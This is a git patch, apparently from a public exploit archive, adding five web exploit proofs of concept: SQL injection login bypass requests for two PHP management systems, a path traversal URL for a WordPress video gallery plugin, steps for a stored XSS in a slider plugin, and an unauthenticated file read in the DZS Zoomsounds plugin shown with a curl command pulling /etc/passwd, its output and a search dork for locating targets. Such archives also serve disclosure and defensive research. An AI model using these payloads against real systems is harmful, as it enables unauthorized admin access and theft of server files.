From 34c9d56d78fe575bd409ab4b959b55a1ba0837f1 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 4 Dec 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-12-04

5 changes to exploits/shellcodes

Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass
Online Magazine Management System 1.0 - SQLi Authentication Bypass
WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)

---
exploits/php/webapps/50560.txt | 37 +++++++++++++++++++
exploits/php/webapps/50561.txt | 35 ++++++++++++++++++
exploits/php/webapps/50562.txt | 13 +++++++
exploits/php/webapps/50563.txt | 19 ++++++++++
exploits/php/webapps/50564.txt | 66 ++++++++++++++++++++++++++++++++++
files_exploits.csv | 5 +++
6 files changed, 175 insertions(+)
create mode 100644 exploits/php/webapps/50560.txt
create mode 100644 exploits/php/webapps/50561.txt
create mode 100644 exploits/php/webapps/50562.txt
create mode 100644 exploits/php/webapps/50563.txt
create mode 100644 exploits/php/webapps/50564.txt
diff --git a/exploits/php/webapps/50560.txt b/exploits/php/webapps/50560.txt
new file mode 100644
index 000000000..ac594ad41
--- /dev/null
+++ b/exploits/php/webapps/50560.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/used_car_showroom/admin/login.php
+Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/50561.txt b/exploits/php/webapps/50561.txt
new file mode 100644
index 000000000..bc207ccd9
--- /dev/null
+++ b/exploits/php/webapps/50561.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Online Magazine Management System 1.0 - SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /magazines/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/magazines/admin/login.php
+Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
\ No newline at end of file
diff --git a/exploits/php/webapps/50562.txt b/exploits/php/webapps/50562.txt
new file mode 100644
index 000000000..ef05bca5f
--- /dev/null
+++ b/exploits/php/webapps/50562.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
+# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
+# Software: All-in-One Video Gallery plugin
+# Version: <= 2.4.9
+# Tested on: Windows,linux
+
+Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc
+
+Decription : Authenticated user can exploit LFI vulnerability in tab parameter.
+
+Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png
+
+You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/
\ No newline at end of file
diff --git a/exploits/php/webapps/50563.txt b/exploits/php/webapps/50563.txt
new file mode 100644
index 000000000..c7effcf44
--- /dev/null
+++ b/exploits/php/webapps/50563.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 02/12/2021
+# Exploit Author: Abdurrahman Erkan (@erknabd)
+# Vendor Homepage: https://soliloquywp.com/
+# Software Link: https://wordpress.org/plugins/soliloquy-lite/
+# Version: 2.6.2
+# Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2
+
+# Proof of Concept:
+#
+# 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.
+# 2- Open Soliloquy and use "Add New" button to add new post.
+# 3- Add payload to title. Payload:
+# 4- Add any image in post.
+# 5- Publish the post.
+# 6- XSS has been triggered.
+#
+# Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.
+# Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.
\ No newline at end of file
diff --git a/exploits/php/webapps/50564.txt b/exploits/php/webapps/50564.txt
new file mode 100644
index 000000000..e18358c19
--- /dev/null
+++ b/exploits/php/webapps/50564.txt
@@ -0,0 +1,66 @@
+# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
+# Date: 2/12/2021
+# Exploit Author: Uriel Yochpaz
+# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
+# Software Link:
+# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+# Tested on: Linux (DZS Zoomsounds version 5.82)
+# CVE : CVE-2021-39316
+
+The vulnerability allows a remote attacker to perform directory traversal attacks.
+The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
+
+Mitigation:
+Install update from vendor's website.
+
+Vulnerable software versions ZoomSounds:
+1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
+2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
+3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
+5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+
+PoC:
+user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+syslog:x:104:108::/home/syslog:/bin/false
+_apt:x:105:65534::/nonexistent:/bin/false
+messagebus:x:106:110::/var/run/dbus:/bin/false
+uuidd:x:107:111::/run/uuidd:/bin/false
+lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
+whoopsie:x:109:117::/nonexistent:/bin/false
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
+avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
+speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
+hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
+kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
+pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
+rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
+saned:x:119:127::/var/lib/saned:/bin/false
+usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
+user:x:1000:1000:user,,,:/home/user:/bin/bash
+mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 948e78a50..40fc72c29 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44646,5 +44646,10 @@ id,file,description,date,author,type,platform,port
 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
+50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
 50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
 50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
+50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
+50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
+50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
+50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,